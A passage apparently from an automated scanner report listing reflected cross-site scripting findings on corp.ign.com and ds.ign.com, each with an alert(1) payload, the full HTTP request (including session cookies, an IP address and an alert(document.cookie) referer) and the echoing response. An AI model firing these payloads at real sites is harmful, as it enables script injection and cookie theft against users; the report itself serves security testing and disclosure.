Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-12684-535296845-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:51 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041291349v-1n-12mc+1297041291349mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 25954

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Privacy Policy - IGN Entertainment</title>
   <link rel="stylesheet" href="http:
...[SNIP]...
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://corp.ign.com/privacy.html?a8174"-alert(1)-"21ae41754ed=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.141. http://corp.ign.com/properties/ign.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /properties/ign.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9015"-alert(1)-"285d6843639 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /properties/ign.html?a9015"-alert(1)-"285d6843639=1 HTTP/1.1
Host: corp.ign.com
Proxy-Connection: keep-alive
Referer: http://corp.ign.com/?64dab%22-alert(document.cookie)-%228250c170f0f=1
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297041142.2; __utmc=173446715; s_pers=%20s_nr%3D1297041153777%7C1299633153777%3B%20s_lv%3D1297041153779%7C1391649153779%3B%20s_lv_s%3DFirst%2520Visit%7C1297042953779%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Axbox360.ign.com%3B%20s_c13%3Dmy.ign.com%253Axbox360.ign.com%3B%20s_sq%3D%3B; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=10089; decc=US; NGUserID=a016c08-31833-869633041-5; i18n-cc=US; freq=c-1297041296732v-1n-12mc+1297041296732mv+0mn+0wwe~0; __utma=1.1277650538.1297041360.1297041360.1297041360.1; __utmb=1; __utmc=1; __utmz=1.1297041360.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; __utmb=173446715; _br_uid_1=uid%3D3168630853761%3A

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:59:57 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297041296732v-2n-12mc+1297041296732mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 8476

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>IGN.com - IGN Entertainment</title>
   <link rel="stylesheet" href="http://corpm
...[SNIP]...
eof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://corp.ign.com/properties/ign.html?a9015"-alert(1)-"285d6843639=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.142. http://corp.ign.com/properties/ign.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /properties/ign.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70a21"><script>alert(1)</script>57433fb9041 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /properties/ign.html?70a21"><script>alert(1)</script>57433fb9041=1 HTTP/1.1
Host: corp.ign.com
Proxy-Connection: keep-alive
Referer: http://corp.ign.com/?64dab%22-alert(document.cookie)-%228250c170f0f=1
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297041142.2; __utmc=173446715; s_pers=%20s_nr%3D1297041153777%7C1299633153777%3B%20s_lv%3D1297041153779%7C1391649153779%3B%20s_lv_s%3DFirst%2520Visit%7C1297042953779%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Axbox360.ign.com%3B%20s_c13%3Dmy.ign.com%253Axbox360.ign.com%3B%20s_sq%3D%3B; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=10089; decc=US; NGUserID=a016c08-31833-869633041-5; i18n-cc=US; freq=c-1297041296732v-1n-12mc+1297041296732mv+0mn+0wwe~0; __utma=1.1277650538.1297041360.1297041360.1297041360.1; __utmb=1; __utmc=1; __utmz=1.1297041360.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; __utmb=173446715; _br_uid_1=uid%3D3168630853761%3A

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:59:51 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297041296732v-2n-12mc+1297041296732mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 8507

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>IGN.com - IGN Entertainment</title>
   <link rel="stylesheet" href="http://corpm
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://corp.ign.com/properties/ign.html?70a21"><script>alert(1)</script>57433fb9041=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.143. http://corp.ign.com/user-agreement.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /user-agreement.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33d36"><script>alert(1)</script>6b98d3a9224 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user-agreement.html?33d36"><script>alert(1)</script>6b98d3a9224=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:40 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-18145-315965756-6;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:40 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041280459v-1n-12mc+1297041280459mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 45096

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>User Agreement - IGN Entertainment</title>
   <link rel="stylesheet" href="http:
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://corp.ign.com/user-agreement.html?33d36"><script>alert(1)</script>6b98d3a9224=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.144. http://corp.ign.com/user-agreement.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /user-agreement.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d792e"-alert(1)-"381dcd5e694 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /user-agreement.html?d792e"-alert(1)-"381dcd5e694=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:42 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-3558-333530059-7;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:42 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041282193v-1n-12mc+1297041282193mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 45066

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>User Agreement - IGN Entertainment</title>
   <link rel="stylesheet" href="http:
...[SNIP]...
eof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://corp.ign.com/user-agreement.html?d792e"-alert(1)-"381dcd5e694=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.145. http://ds.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f985c"-alert(1)-"350b28818c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?f985c"-alert(1)-"350b28818c2=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-26954-911003924-6;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:24 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041684454v-1n-12mc+1297041684454mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 156496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Nintendo DS - DS &
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/?f985c"-alert(1)-"350b28818c2=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.146. http://ds.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ccb3"><script>alert(1)</script>fd8eba6ee0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9ccb3"><script>alert(1)</script>fd8eba6ee0e=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-1825-1664550040-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:21 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041681499v-1n-12mc+1297041681499mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 156368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Nintendo DS - DS &
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/?9ccb3"><script>alert(1)</script>fd8eba6ee0e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.147. http://ds.ign.com/articles/114/1144790p1.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /articles/114/1144790p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2fee"><script>alert(1)</script>feb0c62afa1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/114/1144790p1.html?b2fee"><script>alert(1)</script>feb0c62afa1=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:47:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:47:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-25644-671870716-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:47:21 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043241081v-1n-12mc+1297043241081mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 114971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/articles/114/1144790p1.html?b2fee"><script>alert(1)</script>feb0c62afa1=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.148. http://ds.ign.com/articles/114/1144790p1.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /articles/114/1144790p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 615b0"-alert(1)-"70bd57fc703 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/114/1144790p1.html?615b0"-alert(1)-"70bd57fc703=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:47:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:47:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-13272-220840444-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:47:25 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043245808v-1n-12mc+1297043245808mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 114911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
omscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/articles/114/1144790p1.html?615b0"-alert(1)-"70bd57fc703=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.149. http://ds.ign.com/articles/114/1147000p1.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /articles/114/1147000p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf59c"><script>alert(1)</script>f12d6b81cd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/114/1147000p1.html?cf59c"><script>alert(1)</script>f12d6b81cd4=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:47:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:47:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-22919-1042351517-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:47:40 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043260130v-1n-12mc+1297043260130mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 124871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/articles/114/1147000p1.html?cf59c"><script>alert(1)</script>f12d6b81cd4=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.150. http://ds.ign.com/articles/114/1147000p1.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /articles/114/1147000p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1599"-alert(1)-"883c8f7eb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/114/1147000p1.html?b1599"-alert(1)-"883c8f7eb7=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:47:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:47:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-23512-1315046045-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:47:50 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043270743v-1n-12mc+1297043270743mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 124828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
omscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/articles/114/1147000p1.html?b1599"-alert(1)-"883c8f7eb7=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.151. http://ds.ign.com/index/features.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/features.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a750a"><script>alert(1)</script>0b52f57593c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/features.html?a750a"><script>alert(1)</script>0b52f57593c=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c05-26779-1131264065-8;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:49 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041709653v-1n-12mc+1297041709653mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 145931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Nintendo DS & DSi
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/features.html?a750a"><script>alert(1)</script>0b52f57593c=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.152. http://ds.ign.com/index/features.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/features.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a51fa"-alert(1)-"eea0e1cc2a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/features.html?a51fa"-alert(1)-"eea0e1cc2a2=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c02-24874-173225407-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:53 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041714006v-1n-12mc+1297041714006mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 146047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Nintendo DS & DSi
...[SNIP]...
ypeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
